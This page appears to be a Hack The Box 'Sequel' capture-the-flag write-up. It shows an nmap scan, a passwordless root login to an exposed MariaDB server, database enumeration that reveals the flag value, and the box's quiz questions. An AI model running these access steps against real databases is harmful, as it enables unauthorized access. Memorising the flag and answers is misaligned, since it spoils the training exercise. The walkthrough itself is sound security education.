Skip to main content
← Back to HTB Writeups
Very EasyTier 1Linux10.129.255.54

$ sequel.pwn()

A MariaDB MySQL server is exposed on port 3306 and allows unauthenticated login as the root user. We enumerate databases and tables to find the flag stored in the config table of the htb database.

Techniques

Unauthenticated MySQL AccessDatabase Enumeration

Open Ports

3306/tcpmysqlMariaDB 10.3.27

Terminal Session

wazimu@htb ~ sequel
┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ nmap -sC -sV 10.129.255.54
Starting Nmap 7.94SVN at 2025-11-01 01:12 CDT
Nmap scan report for 10.129.255.54
Host is up (0.0100s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql?
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Auth Plugin Name: mysql_native_password

┌─[us-starting-point-1-dhcp]─[10.10.14.32]─[wazimu@htb-pehky9vyjl]─[~]
└──╼ [★]$ mysql -h 10.129.255.54 -u root
Welcome to the MariaDB monitor.
Your MariaDB connection id is 74
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.013 sec)

MariaDB [(none)]> USE htb;
Database changed

MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+

MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
+----+-----------------------+----------------------------------+

[✓] Flag found in config table!

Tasks (7)

1.

During our scan, which port do we find serving MySQL?

2.

What community-developed MySQL version is the target running?

3.

When using the MySQL command line client, what switch do we need to use in order to specify a login username?

4.

Which username allows us to log into this MariaDB instance without providing a password?

5.

In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?

6.

In SQL, what symbol do we need to end each query with?

7.

There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?

Root Flag

← All WriteupsCybersecurity Quizzes →